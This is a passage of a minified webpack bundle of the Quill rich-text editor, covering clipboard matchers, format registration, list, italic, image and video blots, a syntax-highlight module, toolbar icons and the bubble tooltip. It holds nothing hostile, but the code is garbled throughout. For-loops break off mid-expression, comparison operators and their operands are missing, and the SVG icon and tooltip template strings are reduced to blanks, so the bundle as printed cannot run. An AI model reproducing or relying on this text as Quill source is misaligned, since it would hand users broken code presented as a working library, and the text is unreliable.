l.default.Embed){var i={},t=n.value(e);null!=t&&(i[n.blotName]=t,a=(new s.default).insert(i,n.formats(e)))}else"function"===typeof n.formats&&(a=C(a,n.blotName,n.formats(e)));return a}function R(e,a){return B(a,"\n")||(T(e)||a.length()>0&&e.nextSibling&&T(e.nextSibling))&&a.insert("\n"),a}function K(e,a){if(T(e)&&null!=e.nextElementSibling&&!B(a,"\n\n")){var n=e.offsetHeight+parseFloat(P(e).marginTop)+parseFloat(P(e).marginBottom);e.nextElementSibling.offsetTop>e.offsetTop+1.5*n&&a.insert("\n")}return a}function D(e,a){var n=e.data;if("O:P"===e.parentNode.tagName)return a.insert(n.trim());if(0===n.trim().length&&e.parentNode.classList.contains("ql-clipboard"))return a;if(!P(e.parentNode).whiteSpace.startsWith("pre")){var i=function(e,a){return(a=a.replace(/[^\u00a0]/g,"")).length<1&&e?" ":a};n=(n=n.replace(/\r\n/g," ").replace(/\n/g," ")).replace(/\s\s+/g,i.bind(i,!0)),(null==e.previousSibling&&T(e.parentNode)||null!=e.previousSibling&&T(e.previousSibling))&&(n=n.replace(/^\s+/,i.bind(i,!1))),(null==e.nextSibling&&T(e.parentNode)||null!=e.nextSibling&&T(e.nextSibling))&&(n=n.replace(/\s+$/,i.bind(i,!1)))}return a.insert(n)}j.DEFAULTS={matchers:[],matchVisual:!0},a.default=j,a.matchAttributor=N,a.matchBlot=E,a.matchNewline=R,a.matchSpacing=K,a.matchText=D},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n '},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;ni.right&&(r=i.right-t.right,this.root.style.left=a+r+"px"),t.lefti.bottom){var o=t.bottom-t.top,s=e.bottom-e.top+o;this.root.style.top=n-s+"px",this.root.classList.add("ql-flip")}return r}},{key:"show",value:function(){this.root.classList.remove("ql-editing"),this.root.classList.remove("ql-hidden")}}]),e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function e(a,n,i){null===a&&(a=Function.prototype);var t=Object.getOwnPropertyDescriptor(a,n);if(void 0===t){var r=Object.getPrototypeOf(a);return null===r?void 0:e(r,n,i)}if("value"in t)return t.value;var o=t.get;return void 0!==o?o.call(i):void 0},r=function(){function e(e,a){for(var n=0;n','','',''].join(""),a.default=b},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=R(n(29)),t=n(36),r=n(38),o=n(64),s=R(n(65)),l=R(n(66)),u=n(67),c=R(u),d=n(37),h=n(26),p=n(39),m=n(40),f=R(n(56)),v=R(n(68)),g=R(n(27)),b=R(n(69)),k=R(n(70)),y=R(n(71)),x=R(n(72)),S=R(n(73)),A=n(13),w=R(A),M=R(n(74)),j=R(n(75)),C=R(n(57)),P=R(n(41)),B=R(n(28)),T=R(n(59)),L=R(n(60)),z=R(n(61)),N=R(n(108)),E=R(n(62));function R(e){return e&&e.__esModule?e:{default:e}}i.default.register({"attributors/attribute/direction":r.DirectionAttribute,"attributors/class/align":t.AlignClass,"attributors/class/background":d.BackgroundClass,"attributors/class/color":h.ColorClass,"attributors/class/direction":r.DirectionClass,"attributors/class/font":p.FontClass,"attributors/class/size":m.SizeClass,"attributors/style/align":t.AlignStyle,"attributors/style/background":d.BackgroundStyle,"attributors/style/color":h.ColorStyle,"attributors/style/direction":r.DirectionStyle,"attributors/style/font":p.FontStyle,"attributors/style/size":m.SizeStyle},!0),i.default.register({"formats/align":t.AlignClass,"formats/direction":r.DirectionClass,"formats/indent":o.IndentClass,"formats/background":d.BackgroundStyle,"formats/color":h.ColorStyle,"formats/font":p.FontClass,"formats/size":m.SizeClass,"formats/blockquote":s.default,"formats/code-block":w.default,"formats/header":l.default,"formats/list":c.default,"formats/bold":f.default,"formats/code":A.Code,"formats/italic":v.default,"formats/link":g.default,"formats/script":b.default,"formats/strike":k.default,"formats/underline":y.default,"formats/image":x.default,"formats/video":S.default,"formats/list/item":u.ListItem,"modules/formula":M.default,"modules/syntax":j.default,"modules/toolbar":C.default,"themes/bubble":N.default,"themes/snow":E.default,"ui/icons":P.default,"ui/picker":B.default,"ui/icon-picker":L.default,"ui/color-picker":T.default,"ui/tooltip":z.default},!0),a.default=i.default},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.IndentClass=void 0;var i,t=function(){function e(e,a){for(var n=0;n0&&this.children.tail.format(e,a)}},{key:"formats",value:function(){return e={},a=this.statics.blotName,n=this.statics.formats(this.domNode),a in e?Object.defineProperty(e,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[a]=n,e;var e,a,n}},{key:"insertBefore",value:function(e,n){if(e instanceof h)t(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"insertBefore",this).call(this,e,n);else{var i=null==n?this.length():n.offset(this),r=this.split(i);r.parent.insertBefore(e,r)}}},{key:"optimize",value:function(e){t(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"optimize",this).call(this,e);var n=this.next;null!=n&&n.prev===this&&n.statics.blotName===this.statics.blotName&&n.domNode.tagName===this.domNode.tagName&&n.domNode.getAttribute("data-checked")===this.domNode.getAttribute("data-checked")&&(n.moveChildren(this),n.remove())}},{key:"replace",value:function(e){if(e.statics.blotName!==this.statics.blotName){var n=r.default.create(this.statics.defaultChild);e.moveChildren(n),this.appendChild(n)}t(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"replace",this).call(this,e)}}]),a}(s.default);p.blotName="list",p.scope=r.default.Scope.BLOCK_BLOT,p.tagName=["OL","UL"],p.defaultChild="list-item",p.allowedChildren=[h],a.ListItem=h,a.default=p},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=n(56);function r(e,a){if(!(e instanceof a))throw new TypeError("Cannot call a class as a function")}function o(e,a){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!a||"object"!==typeof a&&"function"!==typeof a?e:a}var s=function(e){function a(){return r(this,a),o(this,(a.__proto__||Object.getPrototypeOf(a)).apply(this,arguments))}return function(e,a){if("function"!==typeof a&&null!==a)throw new TypeError("Super expression must either be null or a function, not "+typeof a);e.prototype=Object.create(a&&a.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),a&&(Object.setPrototypeOf?Object.setPrototypeOf(e,a):e.__proto__=a)}(a,e),a}(((i=t)&&i.__esModule?i:{default:i}).default);s.blotName="italic",s.tagName=["EM","I"],a.default=s},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n-1?n?this.domNode.setAttribute(e,n):this.domNode.removeAttribute(e):r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"format",this).call(this,e,n)}}],[{key:"create",value:function(e){var n=r(a.__proto__||Object.getPrototypeOf(a),"create",this).call(this,e);return"string"===typeof e&&n.setAttribute("src",this.sanitize(e)),n}},{key:"formats",value:function(e){return d.reduce((function(a,n){return e.hasAttribute(n)&&(a[n]=e.getAttribute(n)),a}),{})}},{key:"match",value:function(e){return/\.(jpe?g|gif|png)$/.test(e)||/^data:image\/.+;base64/.test(e)}},{key:"sanitize",value:function(e){return(0,l.sanitize)(e,["http","https","data"])?e:"//:0"}},{key:"value",value:function(e){return e.getAttribute("src")}}]),a}(s.default.Embed);h.blotName="image",h.tagName="IMG",a.default=h},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i,t=function(){function e(e,a){for(var n=0;n-1?n?this.domNode.setAttribute(e,n):this.domNode.removeAttribute(e):r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"format",this).call(this,e,n)}}],[{key:"create",value:function(e){var n=r(a.__proto__||Object.getPrototypeOf(a),"create",this).call(this,e);return n.setAttribute("frameborder","0"),n.setAttribute("allowfullscreen",!0),n.setAttribute("src",this.sanitize(e)),n}},{key:"formats",value:function(e){return d.reduce((function(a,n){return e.hasAttribute(n)&&(a[n]=e.getAttribute(n)),a}),{})}},{key:"sanitize",value:function(e){return l.default.sanitize(e)}},{key:"value",value:function(e){return e.getAttribute("src")}}]),a}(o.BlockEmbed);h.blotName="video",h.className="ql-video",h.tagName="IFRAME",a.default=h},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.FormulaBlot=void 0;var i=function(){function e(e,a){for(var n=0;n0||null==this.cachedText)&&(this.domNode.innerHTML=e(a),this.domNode.normalize(),this.attach()),this.cachedText=a)}}]),a}(l(n(13)).default);h.className="ql-syntax";var p=new r.default.Attributor.Class("token","hljs",{scope:r.default.Scope.INLINE}),m=function(e){function a(e,n){u(this,a);var i=c(this,(a.__proto__||Object.getPrototypeOf(a)).call(this,e,n));if("function"!==typeof i.options.highlight)throw new Error("Syntax module requires highlight.js. Please include the library on the page before Quill.");var t=null;return i.quill.on(o.default.events.SCROLL_OPTIMIZE,(function(){clearTimeout(t),t=setTimeout((function(){i.highlight(),t=null}),i.options.interval)})),i.highlight(),i}return d(a,e),i(a,null,[{key:"register",value:function(){o.default.register(p,!0),o.default.register(h,!0)}}]),i(a,[{key:"highlight",value:function(){var e=this;if(!this.quill.selection.composing){this.quill.update(o.default.sources.USER);var a=this.quill.getSelection();this.quill.scroll.descendants(h).forEach((function(a){a.highlight(e.options.highlight)})),this.quill.update(o.default.sources.SILENT),null!=a&&this.quill.setSelection(a,o.default.sources.SILENT)}}}]),a}(s.default);m.DEFAULTS={highlight:null==window.hljs?null:function(e){return window.hljs.highlightAuto(e).value},interval:1e3},a.CodeBlock=h,a.CodeToken=p,a.default=m},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a){e.exports=' '},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.BubbleTooltip=void 0;var i=function e(a,n,i){null===a&&(a=Function.prototype);var t=Object.getOwnPropertyDescriptor(a,n);if(void 0===t){var r=Object.getPrototypeOf(a);return null===r?void 0:e(r,n,i)}if("value"in t)return t.value;var o=t.get;return void 0!==o?o.call(i):void 0},t=function(){function e(e,a){for(var n=0;n0&&t===o.default.sources.USER){i.show(),i.root.style.left="0px",i.root.style.width="",i.root.style.width=i.root.offsetWidth+"px";var r=i.quill.getLines(a.index,a.length);if(1===r.length)i.position(i.quill.getBounds(a));else{var s=r[r.length-1],l=i.quill.getIndex(s),c=Math.min(s.length()-1,a.index+a.length-l),d=i.quill.getBounds(new u.Range(l,c));i.position(d)}}else document.activeElement!==i.textbox&&i.quill.hasFocus()&&i.hide()})),i}return m(a,e),t(a,[{key:"listen",value:function(){var e=this;i(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"listen",this).call(this),this.root.querySelector(".ql-close").addEventListener("click",(function(){e.root.classList.remove("ql-editing")})),this.quill.on(o.default.events.SCROLL_OPTIMIZE,(function(){setTimeout((function(){if(!e.root.classList.contains("ql-hidden")){var a=e.quill.getSelection();null!=a&&e.position(e.quill.getBounds(a))}}),1)}))}},{key:"cancel",value:function(){this.show()}},{key:"position",value:function(e){var n=i(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"position",this).call(this,e),t=this.root.querySelector(".ql-tooltip-arrow");if(t.style.marginLeft="",0===n)return n;t.style.marginLeft=-1*n-t.offsetWidth/2+"px"}}]),a}(s.BaseTooltip);g.TEMPLATE=['','
','','',"
"].join(""),a.BubbleTooltip=g,a.default=v},function(e,a,n){e.exports=n(63)}]).default},e.exports=a()},3496:function(e,a,n){"use strict";var i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=Object.assign||function(e){for(var a=1;a